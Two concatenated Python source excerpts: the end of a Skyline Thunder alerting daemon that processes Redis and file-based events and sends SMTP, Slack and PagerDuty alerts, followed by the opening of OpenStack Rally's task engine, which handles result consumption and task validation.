logger.error('error :: could not determine event_details from %s Redis set entry (removed) - %s' % (
thunder_redis_set, str(redis_item)))
except Exception as e:
logger.error('error :: could not remove item from Redis set %s - %s' % (
thunder_redis_set, e))
if event_file:
# Delete the bad event_file
removed_file = False
try:
removed_file = remove_file(skyline_app, event_file)
except Exception as e:
logger.error('error :: could not remove event_file %s - %s' % (
event_file, e))
if removed_file:
logger.info('event_file removed - %s' % (
str(event_file)))
spin_start = time()
spin_thunder_process_pid = os.getpid()
logger.info('spin_thunder_process - %s, processing check - %s' % (
str(spin_thunder_process_pid), str(validated_event_details)))
try:
level = str(validated_event_details['level'])
event_type = str(validated_event_details['event_type'])
message = str(validated_event_details['message'])
app = str(validated_event_details['app'])
metric = str(validated_event_details['metric'])
source = str(validated_event_details['source'])
expiry = int(validated_event_details['expiry'])
timestamp = validated_event_details['timestamp']
alert_vias = validated_event_details['alert_vias']
data = validated_event_details['data']
event_file = validated_event_details['event_file']
except Exception as e:
logger.error('error :: spin_thunder_process :: failed to determine variables from event_details - %s' % (
e))
# return
# Handle thunder/rolling alerts first, these are defined by source being
# thunder, thunder/rolling does not assign alert_vias per alert the
# defaults are used
if source == 'thunder' and alert_vias == ['default']:
logger.info('spin_thunder_process - thunder rolling event')
alert_vias = []
alert_via_smtp = True
alert_via_slack = False
alert_via_pagerduty = False
try:
alert_via_smtp = settings.THUNDER_CHECKS[app][event_type]['alert_via_smtp']
if alert_via_smtp:
logger.info('spin_thunder_process - alert_via_smtp: %s' % str(alert_via_smtp))
except KeyError:
alert_via_smtp = True
except Exception as e:
logger.error('error :: failed to determine alert_via_smtp for %s.%s check - %s' % (
app, event_type, e))
if alert_via_smtp:
alert_vias.append('alert_via_smtp')
logger.info('spin_thunder_process - alert_via_smtp appended to alert_vias')
try:
alert_via_slack = settings.THUNDER_CHECKS[app][event_type]['alert_via_slack']
logger.info('spin_thunder_process - alert_via_slack: %s' % str(alert_via_slack))
except KeyError:
logger.error(traceback.format_exc())
logger.error('spin_thunder_process - alert_via_slack KeyError')
alert_via_slack = False
except Exception as e:
logger.error('error :: failed to determine alert_via_slack for %s.%s check - %s' % (
app, event_type, e))
if alert_via_slack:
alert_vias.append('alert_via_slack')
logger.info('spin_thunder_process - alert_via_slack appended to alert_vias')
try:
alert_via_pagerduty = settings.THUNDER_CHECKS[app][event_type]['alert_via_pagerduty']
if alert_via_pagerduty:
logger.info('spin_thunder_process - alert_via_pagerduty: %s' % str(alert_via_pagerduty))
except KeyError:
alert_via_pagerduty = False
except Exception as e:
logger.error('error :: failed to determine alert_via_smtp for %s.%s check - %s' % (
app, event_type, e))
if alert_via_pagerduty:
alert_vias.append('alert_via_pagerduty')
logger.info('spin_thunder_process - alert_via_pagerduty appended to alert_vias')
subject = message
body = str(data)
alerts_sent = 0
logger.info('spin_thunder_process - thunder rolling event alert_vias: %s' % str(alert_vias))
for alert_via in alert_vias:
alert_sent = False
try:
if alert_via == 'alert_via_slack':
title = 'Skyline Thunder - %s' % level.upper()
with_subject = subject.replace(level, '')
title = title + with_subject
alert_sent = thunder_alert(alert_via, title, body)
if alert_via == 'alert_via_smtp':
title = 'Skyline Thunder - %s' % level.upper()
with_subject = subject.replace(level, '')
final_subject = title + with_subject
alert_sent = thunder_alert(alert_via, final_subject, data['status'])
if alert_via == 'alert_via_pagerduty':
alert_sent = thunder_alert(alert_via, subject, str(body))
if alert_sent:
logger.info('sent thunder_alert(%s, %s' % (
str(alert_via), str(subject)))
alerts_sent += 1
except Exception as e:
logger.error('error :: failed to alert_via %s for %s.%s check - %s' % (
alert_via, app, event_type, e))
cache_key = 'thunder.alert.%s.%s' % (app, event_type)
if alerts_sent:
if level == 'alert':
create_alert_cache_key(cache_key, expiry, timestamp)
remove_event(redis_item, event_file)
logger.info('%s alerts sent for the %s alert_vias' % (
str(alerts_sent), str(len(alert_vias))))
# stale metric alerts
if source == 'analyzer' and event_type == 'stale_metrics':
alerts_sent_dict = {}
try:
parent_namespace = data['namespace']
stale_metrics = data['stale_metrics']
alerts_sent_dict = alert_on_stale_metrics(self, level, message, parent_namespace, stale_metrics, data)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: alert_on_stale_metrics failed for %s - %s' % (
parent_namespace, e))
all_sent = False
if alerts_sent_dict:
all_sent = alerts_sent_dict['all_sent']
logger.info('%s alerts of %s sent for stale_metrics on %s' % (
str(alerts_sent_dict['to_send']),
str(alerts_sent_dict['sent']), parent_namespace))
if not all_sent:
logger.warn('warning :: all alerts were not sent - %s' % (
str(alerts_sent_dict)))
if all_sent:
if level == 'alert':
cache_key = 'thunder.alert.%s.%s.%s.%s' % (
app, event_type, level, str(timestamp))
create_alert_cache_key(cache_key, expiry, timestamp)
remove_event(redis_item, event_file)
# no_data alerts
if source == 'analyzer' and event_type == 'no_data':
alerts_sent_dict = {}
parent_namespace = None
try:
parent_namespace = data['namespace']
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not determine parent_namespace from data %s - %s' % (
str(data), e))
remove_event(redis_item, event_file)
send_no_data_alert = True
if parent_namespace:
if level == 'alert':
thunder_no_data_alert_key = 'thunder.alert.no_data.%s' % parent_namespace
thunder_no_data_alert_key_exists = False
try:
thunder_no_data_alert_key_exists = self.redis_conn_decoded.get(thunder_no_data_alert_key)
if thunder_no_data_alert_key_exists:
send_no_data_alert = False
logger.info('Redis key %s exists, not send no_data alert for %s' % (
thunder_no_data_alert_key, parent_namespace))
remove_event(redis_item, event_file)
except Exception as e:
logger.error('error :: failed Redis key %s - %s' % (
thunder_no_data_alert_key, e))
if parent_namespace and send_no_data_alert:
try:
alerts_sent_dict = alert_on_no_data(self, level, message, parent_namespace, data)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not remove event_file %s - %s' % (
event_file, e))
all_sent = False
if alerts_sent_dict:
all_sent = alerts_sent_dict['all_sent']
logger.info('%s alerts of %s sent for no_data on %s' % (
str(alerts_sent_dict['to_send']),
str(alerts_sent_dict['sent']), parent_namespace))
if not all_sent:
logger.warn('warning :: all alerts were not sent - %s' % (
str(alerts_sent_dict)))
if all_sent:
remove_event(redis_item, event_file)
spin_end = time() - spin_start
logger.info('spin_thunder_process took %.2f seconds' % spin_end)
return
def run(self):
"""
- Called when the process intializes.
- Determine if Redis is up and discover checks to run.
- If Redis is down and discover checks to run from the filesystem.
- Process event.
- Wait for the processes to finish.
- Repeat.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
if not os.path.exists(settings.SKYLINE_TMP_DIR):
try:
mkdir_p(settings.SKYLINE_TMP_DIR)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s - %s' % (settings.SKYLINE_TMP_DIR, e))
# Create the required THUNDER directories which are failed over to and
# used in the event that Redis is down
if not os.path.exists(THUNDER_EVENTS_DIR):
try:
mkdir_p(THUNDER_EVENTS_DIR)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s - %s' % (THUNDER_EVENTS_DIR, e))
if not os.path.exists(THUNDER_KEYS_DIR):
try:
mkdir_p(THUNDER_KEYS_DIR)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s - %s' % (THUNDER_KEYS_DIR, e))
last_sent_to_graphite = int(time())
thunder_alerts_sent = 0
last_check_for_events_on_filesystem = int(last_sent_to_graphite)
while True:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
logger.info('Redis ping OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cannot connect to redis at socket path %s - %s' % (
settings.REDIS_SOCKET_PATH, e))
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
logger.info('connected via get_redis_conn')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: not connected via get_redis_conn - %s' % e)
continue
try:
self.redis_conn_decoded.ping()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: not connected via get_redis_conn_decoded - %s' % e)
sleep(10)
try:
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
logger.info('onnected via get_redis_conn_decoded')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cannot connect to get_redis_conn_decoded - %s' % e)
continue
"""
Determine if any metric has been added to process
"""
thunder_last_run = int(time())
total_thunder_events_item_count = 0
while True:
validated_event_details = {}
current_timestamp = int(time())
if total_thunder_events_item_count == 0:
if (current_timestamp - thunder_last_run) < 3:
sleep(2)
thunder_last_run = int(current_timestamp)
# Report app AND Redis as up
redis_is_up = False
try:
redis_is_up = self.redis_conn.setex(skyline_app, 120, current_timestamp)
if redis_is_up:
try:
logger.info('set thunder Redis key')
self.redis_conn.setex('redis', 120, current_timestamp)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis redis key - %s' % (
e))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis %s key - %s' % (
skyline_app, e))
if not settings.THUNDER_ENABLED:
sleep(59)
break
# break to send metrics
if int(time()) >= (last_sent_to_graphite + 60):
break
# Determine events to process from the Redis set
thunder_events = []
if redis_is_up:
try:
thunder_events = self.redis_conn_decoded.smembers(thunder_redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (thunder_redis_set, e))
# If no data was returned from Redis ensure thunder_events is
# a set so that any event_files can be added to the set
if thunder_events:
logger.info('%s entries in thunder.events Redis set' % str(len(thunder_events)))
if not isinstance(thunder_events, set):
thunder_events = set(thunder_events)
else:
thunder_events = []
thunder_events = set(thunder_events)
# Check the filesystem for failover event files
filesystem_check_timestamp = int(time())
if (last_check_for_events_on_filesystem + 60) >= filesystem_check_timestamp:
last_check_for_events_on_filesystem = filesystem_check_timestamp
logger.info('checking for failover event files in %s' % THUNDER_EVENTS_DIR)
thunder_event_files_count = 0
for root, dirs, files in os.walk(THUNDER_EVENTS_DIR):
if files:
for file in files:
event_file = '%s/%s' % (root, file)
try:
data_dict = None
try:
with open(event_file, 'r') as f:
data_dict_str = f.read()
except Exception as e:
logger.error('error :: failed to open event_file: %s - %s' % (event_file, e))
try:
data_dict = literal_eval(data_dict_str)
if data_dict:
data_dict['event_file'] = event_file
thunder_events.add(str(data_dict))
except Exception as e:
logger.error('error :: failed to literal_eval event_file: %s - %s' % (event_file, e))
except Exception as e:
logger.error('failed evaluate event_file %s - %s' % (
event_file, e))
logger.info('%s thunder failover event files found' % str(thunder_event_files_count))
# Check the filesystem for failover key files
logger.info('checking for failover keys in %s' % THUNDER_KEYS_DIR)
thunder_key_files_count = 0
for root, dirs, files in os.walk(THUNDER_KEYS_DIR):
if files:
for file in files:
thunder_key_file = '%s/%s' % (root, file)
try:
key_dict = None
try:
with open(thunder_key_file, 'r') as f:
key_dict_str = f.read()
key_dict = literal_eval(key_dict_str)
thunder_key_files_count += 1
except Exception as e:
logger.error('error :: failed to open thunder_key_file: %s - %s' % (
thunder_key_file, e))
timestamp = 0
if key_dict:
try:
timestamp = key_dict['timestamp']
expiry = int(key_dict['expiry'])
except Exception as e:
logger.error('error :: failed to determine timestamp and expiry from key_dict created from thunder_key_file: %s - %s' % (
thunder_key_file, e))
if timestamp:
now = int(time())
if (timestamp + expiry) >= now:
expiry = 0
try:
removed_file = remove_file(thunder_key_file)
if removed_file:
logger.info('removed expired thunder_key_file: %s' % (
thunder_key_file))
except Exception as e:
logger.error('error :: failed to remove %s, continuing - %s' % (
thunder_key_file, e))
if (timestamp + expiry) <= now:
expiry = now - (timestamp + expiry)
except Exception as e:
logger.error('failed evaluate thunder_key_file: %s - %s' % (
thunder_key_file, e))
logger.info('%s thunder failover key files found' % str(thunder_key_files_count))
total_thunder_events_item_count = len(thunder_events)
validated_event_details = {}
if thunder_events:
logger.info('getting a thunder event to process from the %s events' % str(total_thunder_events_item_count))
for index, event_item in enumerate(thunder_events):
# if validated_event_details:
# break
try:
remove_item = False
redis_item = event_item
try:
event_details = literal_eval(event_item)
except Exception as e:
remove_item = True
event_details = None
logger.error('error :: could not determine event_details from %s Redis set entry - %s' % (
thunder_redis_set, e))
missing_required_keys = False
if event_details:
logger.info('validating thunder event_details: %s' % str(event_details))
try:
level = str(event_details['level'])
except KeyError:
level = 'alert'
except Exception as e:
logger.error('error :: failed to determine level from event_details dict set to alert - %s' % (
e))
level = 'alert'
validated_event_details['level'] = level
try:
event_type = str(event_details['event_type'])
except KeyError:
event_type = str(event_details['type'])
except Exception as e:
logger.error('error :: failed to determine type from event_details dict - %s' % (
e))
event_type = False
validated_event_details['event_type'] = event_type
try:
message = str(event_details['message'])
except KeyError:
message = False
except Exception as e:
logger.error('error :: failed to determine message from event_details dict - %s' % (
e))
message = False
validated_event_details['message'] = message
try:
app = str(event_details['app'])
except KeyError:
app = False
except Exception as e:
logger.error('error :: failed to determine app from event_details dict - %s' % (
e))
app = False
validated_event_details['app'] = app
try:
metric = str(event_details['metric'])
except KeyError:
metric = False
except Exception as e:
logger.error('error :: failed to determine metric from event_details dict - %s' % (
e))
metric = False
validated_event_details['metric'] = metric
try:
source = str(event_details['source'])
except KeyError:
source = False
except Exception as e:
logger.error('error :: failed to determine source from event_details dict - %s' % (
e))
source = False
validated_event_details['source'] = source
try:
expiry = int(event_details['expiry'])
except KeyError:
expiry = 900
except Exception as e:
logger.error('error :: failed to determine expiry from event_details dict - %s' % (
e))
expiry = 900
validated_event_details['expiry'] = expiry
try:
timestamp = event_details['timestamp']
except KeyError:
timestamp = int(time())
except Exception as e:
logger.error('error :: failed to determine timestamp from event_details dict - %s' % (
e))
timestamp = int(time())
validated_event_details['timestamp'] = timestamp
try:
alert_vias = event_details['alert_vias']
except KeyError:
alert_vias = []
except Exception as e:
logger.error('error :: failed to determine alert_vias from event_details dict - %s' % (
e))
alert_vias = []
validated_event_details['alert_vias'] = alert_vias
if source == 'thunder':
validated_event_details['alert_vias'] = ['default']
try:
data = event_details['data']
except Exception as e:
logger.error('error :: failed to determine data from event_details dict - %s' % (
e))
data = {'status': None}
validated_event_details['data'] = data
# Add the event_file, this is related to files used
# for events and keys where a Redis failure is
# experienced
try:
event_file = event_details['event_file']
except KeyError:
event_file = None
except Exception as e:
logger.error('error :: failed to determine event_file from event_details dict - %s' % (
e))
event_file = None
validated_event_details['event_file'] = event_file
if not event_type:
missing_required_keys = True
if not app:
missing_required_keys = True
if not message:
missing_required_keys = True
if missing_required_keys or remove_item:
logger.info('invalidating thunder event_details, missing_required_keys: %s' % str(missing_required_keys))
validated_event_details = {}
if not event_file:
# Delete the bad item in the Redis set
try:
removed_item = update_redis_set(
skyline_app, thunder_redis_set, event_item,
'remove', log=True)
if removed_item:
logger.error('error :: could not determine event_details from %s Redis set entry (removed) - %s' % (
thunder_redis_set, str(event_item)))
except Exception as e:
logger.error('error :: could not remove bad item from Redis set %s - %s' % (
thunder_redis_set, e))
else:
# Delete the bad event_file
removed_file = False
try:
removed_file = remove_file(skyline_app, event_file)
except Exception as e:
logger.error('error :: could not remove bad event_file %s - %s' % (
event_file, e))
if removed_file:
logger.error('error :: could not determine event_details from the event_file (removed) - %s' % (
str(event_file)))
continue
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: validating and checking event - %s' % (
e))
if validated_event_details:
logger.info('thunder event_details validated')
if validated_event_details['source'] == 'thunder':
validated_event_details['alert_vias'] = ['default']
logger.info('thunder event_details validated')
# Check if an alert has gone out if so removed the item
if validated_event_details and level == 'alert':
alert_cache_key = 'thunder.alert.%s.%s.%s.%s' % (
app, event_type, level, str(timestamp))
alerted = None
try:
alerted = self.redis_conn_decoded.get(alert_cache_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s Redis key - %s' % (
alert_cache_key, e))
if not alerted:
alerted = check_thunder_failover_key(self, alert_cache_key)
if alerted:
logger.info('alert already sent for %s, removing event item' % alert_cache_key)
validated_event_details = {}
if redis_item:
# Delete the item from the Redis set
try:
removed_item = update_redis_set(
skyline_app, thunder_redis_set, redis_item,
'remove', log=True)
if removed_item:
logger.info('alert key exists, removed event_details from %s Redis set entry - %s' % (
thunder_redis_set, str(redis_item)))
except Exception as e:
logger.error('error :: could not remove item from Redis set %s - %s' % (
thunder_redis_set, e))
if event_file:
# Delete the bad event_file
removed_file = False
try:
removed_file = remove_file(skyline_app, event_file)
except Exception as e:
logger.error('error :: could not remove event_file %s - %s' % (
event_file, e))
if removed_file:
logger.info('alert key exists, event_file removed - %s' % (
str(event_file)))
continue
if validated_event_details:
# Check if the event has been actioned in the
# current run, if so skip.
# until the key expires
current_event_cache_key = 'thunder.current.%s.%s.%s.%s' % (
app, event_type, level, str(timestamp))
current_event = None
try:
current_event = self.redis_conn_decoded.get(current_event_cache_key)
if current_event:
logger.info('current_event_cache_key exist in Redis %s for this event, skipping' % current_event_cache_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s Redis key - %s' % (
current_event_cache_key, e))
if not current_event:
current_event = check_thunder_failover_key(self, current_event_cache_key)
if current_event:
logger.info('current_event_cache_key exist %s as a check_thunder_failover_key for this event, skipping' % current_event_cache_key)
if current_event:
validated_event_details = {}
logger.info('current_event_cache_key exist %s for this event, skipping' % current_event_cache_key)
# continue
if validated_event_details:
try:
self.redis_conn_decoded.setex(current_event_cache_key, 59, int(time()))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to setex %s Redis key - %s' % (
current_event_cache_key, e))
try:
failover_key_file = '%s/%s' % (THUNDER_KEYS_DIR, current_event_cache_key)
failover_key_data = {'timestamp': int(time()), 'expiry': 59}
write_data_to_file(
skyline_app, failover_key_file, 'w',
str(failover_key_data))
logger.info('added Redis failover - failover_key_file - %s' % (failover_key_file))
except Exception as e:
logger.error('error :: failed to add Redis failover failover_key_file - %s - %s' % (failover_key_file, e))
redis_item = event_item
break
if not validated_event_details:
sleep_for = 30
right_now = int(time())
next_send_to_graphite = last_sent_to_graphite + 60
if right_now >= next_send_to_graphite:
sleep_for = 0.1
if (next_send_to_graphite - right_now) < sleep_for:
sleep_for = next_send_to_graphite - right_now
sleep(sleep_for)
if validated_event_details:
logger.info('processing 1 event of %s thunder events to process' % str(total_thunder_events_item_count))
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
THUNDER_PROCESSES = 1
for i in range(1, THUNDER_PROCESSES + 1):
p = Process(target=self.spin_thunder_process, args=(i, validated_event_details, redis_item, event_file))
pids.append(p)
pid_count += 1
logger.info('starting spin_thunder_process')
p.start()
spawned_pids.append(p.pid)
thunder_alerts_sent += 1
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_thunder_process
# that has run for longer than 58 seconds
p_starts = time()
while time() - p_starts <= 58:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('1 spin_thunder_process completed in %.2f seconds' % (time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all spin_thunder_process processes')
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('stopping spin_thunder_process - %s' % (str(p.is_alive())))
p.join()
if int(time()) >= (last_sent_to_graphite + 60):
logger.info('alerts.sent :: %s' % str(thunder_alerts_sent))
send_metric_name = '%s.alerts.sent' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(thunder_alerts_sent))
last_sent_to_graphite = int(time())
thunder_alerts_sent = 0
try:
thunder_events = self.redis_conn_decoded.smembers(thunder_redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (thunder_redis_set, e))
|
engine.py | # Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
import threading
import time
import traceback
import jsonschema
from oslo_config import cfg
from rally.common import logging
from rally.common import objects
from rally.common import utils
from rally import consts
from rally import exceptions
from rally.task import context
from rally.task import hook
from rally.task import runner
from rally.task import scenario
from rally.task import sla
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
TASK_ENGINE_OPTS = [
cfg.IntOpt("raw_result_chunk_size", default=1000, min=1,
help="Size of raw result chunk in iterations"),
]
class ResultConsumer(object):
"""ResultConsumer class stores results from ScenarioRunner, checks SLA.
Also ResultConsumer listens for runner events and notifies HookExecutor
about started iterations.
"""
def __init__(self, workload_cfg, task, subtask, workload, runner,
abort_on_sla_failure):
"""ResultConsumer constructor.
:param workload_cfg: A configuration of the Workload
:param task: Instance of Task, task to run
:param subtask: Instance of Subtask
:param workload: Instance of Workload
:param runner: ScenarioRunner instance that produces results to be
consumed
:param abort_on_sla_failure: True if the execution should be stopped
when some SLA check fails
"""
self.task = task
self.subtask = subtask
self.workload = workload
self.workload_cfg = workload_cfg
self.runner = runner
self.load_started_at = float("inf")
self.load_finished_at = 0
self.workload_data_count = 0
self.sla_checker = sla.SLAChecker(self.workload_cfg)
self.hook_executor = hook.HookExecutor(self.workload_cfg, self.task)
self.abort_on_sla_failure = abort_on_sla_failure
self.is_done = threading.Event()
self.unexpected_failure = {}
self.results = []
self.thread = threading.Thread(target=self._consume_results)
self.aborting_checker = threading.Thread(target=self.wait_and_abort)
if self.workload_cfg["hooks"]:
self.event_thread = threading.Thread(target=self._consume_events)
def __enter__(self):
self.thread.start()
self.aborting_checker.start()
if self.workload_cfg["hooks"]:
self.event_thread.start()
self.start = time.time()
return self
def _consume_results(self):
task_aborted = False
while True:
if self.runner.result_queue:
results = self.runner.result_queue.popleft()
self.results.extend(results)
for r in results:
self.load_started_at = min(r["timestamp"],
self.load_started_at)
self.load_finished_at = max(r["duration"] + r["timestamp"],
self.load_finished_at)
success = self.sla_checker.add_iteration(r)
if (self.abort_on_sla_failure and
not success and
not task_aborted):
self.sla_checker.set_aborted_on_sla()
self.runner.abort()
self.task.update_status(
consts.TaskStatus.SOFT_ABORTING)
task_aborted = True
# save results chunks
chunk_size = CONF.raw_result_chunk_size
while len(self.results) >= chunk_size:
results_chunk = self.results[:chunk_size]
self.results = self.results[chunk_size:]
results_chunk.sort(key=lambda x: x["timestamp"])
self.workload.add_workload_data(self.workload_data_count,
{"raw": results_chunk})
self.workload_data_count += 1
elif self.is_done.isSet():
break
else:
time.sleep(0.1)
def _consume_events(self):
while not self.is_done.isSet() or self.runner.event_queue:
if self.runner.event_queue:
event = self.runner.event_queue.popleft()
self.hook_executor.on_event(
event_type=event["type"], value=event["value"])
else:
time.sleep(0.01)
def __exit__(self, exc_type, exc_value, exc_traceback):
self.finish = time.time()
self.is_done.set()
self.aborting_checker.join()
self.thread.join()
if exc_type:
self.sla_checker.set_unexpected_failure(exc_value)
if objects.Task.get_status(
self.task["uuid"]) == consts.TaskStatus.ABORTED:
self.sla_checker.set_aborted_manually()
load_duration = max(self.load_finished_at - self.load_started_at, 0)
LOG.info("Load duration is: %s" % utils.format_float_to_str(
load_duration))
LOG.info("Full runner duration is: %s" %
utils.format_float_to_str(self.runner.run_duration))
LOG.info("Full duration is: %s" % utils.format_float_to_str(
self.finish - self.start))
results = {}
if self.workload_cfg["hooks"]:
self.event_thread.join()
results["hooks_results"] = self.hook_executor.results()
if self.results:
# NOTE(boris-42): Sort in order of starting
# instead of order of ending
self.results.sort(key=lambda x: x["timestamp"])
self.workload.add_workload_data(self.workload_data_count,
{"raw": self.results})
start_time = (self.load_started_at
if self.load_started_at != float("inf") else None)
self.workload.set_results(load_duration=load_duration,
full_duration=(self.finish - self.start),
sla_results=self.sla_checker.results(),
start_time=start_time, **results)
@staticmethod
def is_task_in_aborting_status(task_uuid, check_soft=True):
"""Checks task is in abort stages
:param task_uuid: UUID of task to check status
:type task_uuid: str
:param check_soft: check or not SOFT_ABORTING status
:type check_soft: bool
"""
stages = [consts.TaskStatus.ABORTING, consts.TaskStatus.ABORTED]
if check_soft:
stages.append(consts.TaskStatus.SOFT_ABORTING)
return objects.Task.get_status(task_uuid) in stages
def wait_and_abort(self):
"""Waits until abort signal is received and aborts runner in this case.
Has to be run from different thread simultaneously with the
runner.run method.
"""
while not self.is_done.isSet():
if self.is_task_in_aborting_status(self.task["uuid"],
check_soft=False):
self.runner.abort()
self.task.update_status(consts.TaskStatus.ABORTED)
break
time.sleep(2.0)
class TaskAborted(Exception):
"""Task aborted exception
Used by TaskEngine to interrupt task run.
"""
class TaskEngine(object):
"""The Task engine class is used to execute benchmark scenarios.
An instance of this class is initialized by the API with the task
configuration and then is used to validate and execute all specified
in config subtasks.
.. note::
Typical usage:
...
engine = TaskEngine(config, task, deployment)
engine.validate() # to test config
engine.run() # to run config
"""
def __init__(self, config, task, deployment,
abort_on_sla_failure=False):
"""TaskEngine constructor.
:param config: An instance of a TaskConfig
:param task: Instance of Task,
the current task which is being performed
:param deployment: Instance of Deployment,
:param abort_on_sla_failure: True if the execution should be stopped
when some SLA check fails
"""
self.config = config
self.task = task
self.deployment = deployment
self.abort_on_sla_failure = abort_on_sla_failure
def _validate_workload(self, workload, vcontext=None, vtype=None):
"""Validate a workload.
:param workload: a workload configuration
:param vcontext: a validation context
:param vtype: a type of validation (platform, syntax or semantic)
"""
scenario_cls = scenario.Scenario.get(workload["name"])
scenario_context = copy.deepcopy(scenario_cls.get_default_context())
results = []
results.extend(scenario.Scenario.validate(
name=workload["name"],
context=vcontext,
config=workload,
plugin_cfg=None,
vtype=vtype))
if workload["runner_type"]:
results.extend(runner.ScenarioRunner.validate(
name=workload["runner_type"],
context=vcontext,
config=None,
plugin_cfg=workload["runner"],
vtype=vtype))
for context_name, context_conf in workload["contexts"].items():
results.extend(context.Context.validate(
name=context_name,
context=vcontext,
config=None,
plugin_cfg=context_conf,
vtype=vtype))
for context_name, context_conf in scenario_context.items():
results.extend(context.Context.validate(
name=context_name,
context=vcontext,
config=None,
plugin_cfg=context_conf,
allow_hidden=True,
vtype=vtype))
for sla_name, sla_conf in workload["sla"].items():
results.extend(sla.SLA.validate(
name=sla_name,
context=vcontext,
config=None,
plugin_cfg=sla_conf,
vtype=vtype))
for hook_conf in workload["hooks"]:
action_name, action_cfg = hook_conf["action"]
results.extend(hook.HookAction.validate(
name=action_name,
context=vcontext,
config=None,
plugin_cfg=action_cfg,
vtype=vtype))
trigger_name, trigger_cfg = hook_conf["trigger"]
results.extend(hook.HookTrigger.validate(
name=trigger_name,
context=vcontext,
config=None,
plugin_cfg=trigger_cfg,
vtype=vtype))
if results:
msg = "\n ".join(results)
kw = {"name": workload["name"],
"pos": workload["position"],
"config": json.dumps(
objects.Workload.to_task(workload)),
"reason": msg}
raise exceptions.InvalidTaskConfig(**kw)
@logging.log_task_wrapper(LOG.info, "Task validation of syntax.")
def _validate_config_syntax(self, config):
for subtask in config.subtasks:
for workload in subtask["workloads"]:
self._validate_workload(workload, vtype="syntax")
@logging.log_task_wrapper(LOG.info,
"Task validation of required platforms.")
def _validate_config_platforms(self, config):
# FIXME(andreykurilin): prepare the similar context object to others
credentials = self.deployment.get_all_credentials()
ctx = {"task": self.task,
"platforms": dict((p, creds[0])
for p, creds in credentials.items())}
for subtask in config.subtasks:
for workload in subtask["workloads"]:
self._validate_workload(
workload, vcontext=ctx, vtype="platform")
@logging.log_task_wrapper(LOG.info, "Task validation of semantic.")
def _validate_config_semantic(self, config):
self.deployment.verify_connections()
validation_ctx = self.deployment.get_validation_context()
ctx_obj = {"task": self.task, "config": validation_ctx}
with context.ContextManager(ctx_obj):
for subtask in config.subtasks:
for workload in subtask["workloads"]:
self._validate_workload(
workload, vcontext=ctx_obj, vtype="semantic")
@logging.log_task_wrapper(LOG.info, "Task validation.")
def validate(self, only_syntax=False):
"""Perform full task configuration validation.
:param only_syntax: Check only syntax of task configuration
"""
self.task.update_status(consts.TaskStatus.VALIDATING)
try:
self._validate_config_syntax(self.config)
if only_syntax:
return
self._validate_config_platforms(self.config)
self._validate_config_semantic(self.config)
except Exception as e:
exception_info = json.dumps(traceback.format_exc(), indent=2,
separators=(",", ": "))
self.task.set_failed(type(e).__name__, str(e), exception_info)
if (logging.is_debug() and
not isinstance(e, exceptions.InvalidTaskConfig)):
LOG.exception("Invalid Task")
raise exceptions.InvalidTaskException(str(e))
def _prepare_context(self, ctx, scenario_name, owner_id):
context_config = {}
# restore full names of plugins
scenario_plugin = scenario.Scenario.get(scenario_name)
for k, v in scenario_plugin.get_default_context().items():
c = context.Context.get(k, allow_hidden=True)
context_config[c.get_fullname()] = v
